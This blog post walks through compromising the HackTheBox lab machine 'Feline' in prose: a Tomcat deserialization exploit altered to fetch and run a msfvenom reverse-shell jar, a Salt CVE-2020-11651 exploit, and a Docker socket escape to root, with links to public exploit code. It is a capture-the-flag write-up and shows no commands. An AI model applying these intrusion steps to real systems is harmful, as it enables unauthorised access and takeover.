Monday, May 30, 2022

HTB Walkthrough.- Feline

 Feline.

This is a HARD rated box in HackTheBox. This is going to be one of the rare hard boxes as they take a lot of time and effort and constitute a lot of my very important days. However, let’s see how we go.


As usual, starting with our nmap scan.



We can see that we only have port 8080 open, where we have Apache Tomcat 9.0.27 running and a SSH port 22 is also open.



We see this on our home page. We can also see some other tabs in the menu; one of which is the services tab. Let’s click and see where we go.



Hmm, we can upload any type of file in here. However, I can’t seem to run any of the uploads or get any type of response back. Weird. We know the tomcat version, so let's see if there’s any public exploits out there.


I immediately find a remote code execution for this version number: https://github.com/PenTestical/CVE-2020-9484



However, the normal bash exploit didn’t seem to work for me. So I changed the exploit to fit my needs and did some custom exploitation.



I changed the exploit to download a .jar file from my server and then subsequently run it.

I generated a reverse shell jar file using msfvenom.



After running the exploit, I got my first reverse shell!



Ok nice, we’re in a shell now.

Now, let’s try and escalate our privileges. Let’s see if there are any ports open locally and accessible only locally.



We can see that port 4505 and port 4506 are present and only accessible locally. After a quick search of google, I now know that these are ports used by the ‘Salt’ program. 

Let’s see if there are any publicly available exploits for Salt.


I find this program here: https://github.com/rossengeorgiev/salt-security-backports/blob/master/salt-cve-check.py to check if the current Salt version is exploitable. But first let’s forward the local ports to be accessible through my pwing machine.



After I run this exploit locally, I find that the salt program running is indeed vulnerable.


Then, after searching for exploits, this github exploit looks promising: https://github.com/jasperla/CVE-2020-11651-poc


I create a simple rev.py python reverse shell and try to execute it using salt.



I then get back a reverse shell!



Nice. Now looking at my username and the machine name, it looks like I’m in a docker container.

I do some more enumeration and finalise that I indeed am in a docker environment.

So, let's look for ways to break out of the current docker container. We know that docker runs as root, so if we find a way to break-out we’ll be root in the main host OS.


After some enumeration, I found a docker.sock unix socket inside /run. Docker.sock can be used to easily break out of docker by creating a new container.


Following this tutorial: https://secureideas.com/blog/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html


I create a container.json file and start with my docker breakout.



YES! We’ve finally rooted! Docker breakout was successful and we got root.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Easy shellcode encryption and decryption using AES in C/C++

 I'm writing this blog post as I came across this problem myself while trying to encrypt and decrypt my shellcode while writing malware....